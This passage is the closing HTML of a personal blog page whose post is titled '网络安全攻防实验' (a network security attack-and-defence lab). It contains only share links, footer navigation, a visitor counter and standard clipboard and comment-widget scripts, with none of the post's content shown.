  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://p5ych2022.github.io/2024/10/28/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E5%AE%9E%E9%AA%8C/&title=网络安全攻防实验"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://p5ych2022.github.io/2024/10/28/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E5%AE%9E%E9%AA%8C/&title=网络安全攻防实验"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://p5ych2022.github.io/2024/10/28/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E5%AE%9E%E9%AA%8C/&title=网络安全攻防实验"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://p5ych2022.github.io/2024/10/28/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E5%AE%9E%E9%AA%8C/&name=网络安全攻防实验&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://p5ych2022.github.io/2024/10/28/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E5%AE%9E%E9%AA%8C/&t=网络安全攻防实验"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2022-2024
    psych
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Article</a></li><!--
     --><!--
       --><li><a href="/tags/">Tag</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
    </ul>
    <ul>
      
        <!-- 不蒜子统计 -->
        <span id="busuanzi_container_site_pv">
            本站总访问量<span id="busuanzi_value_site_pv"></span>次
        </span>
        <span class="post-meta-divider">|</span>
        <span id="busuanzi_container_site_uv" style='display:none'>
                本站访客数<span id="busuanzi_value_site_uv"></span>人
        </span>
      <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
      
    </ul>
  </nav>
</div>

</footer>
    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

    <script type="text/javascript">
      var utterances_repo = 'p5ych2022/psych.green';
      var utterances_issue_term = 'pathname';
      var utterances_label = 'Comment';
      var utterances_theme = 'github-dark';

      (function(){
          var script = document.createElement('script');

          script.src = 'https://utteranc.es/client.js';
          script.setAttribute('repo', utterances_repo);
          script.setAttribute('issue-term', 'pathname');
          script.setAttribute('label', utterances_label);
          script.setAttribute('theme', utterances_theme);
          script.setAttribute('crossorigin', 'anonymous');
          script.async = true;
          (document.getElementById('utterances_thread')).appendChild(script);
      }());
  </script>

</body>
</html>
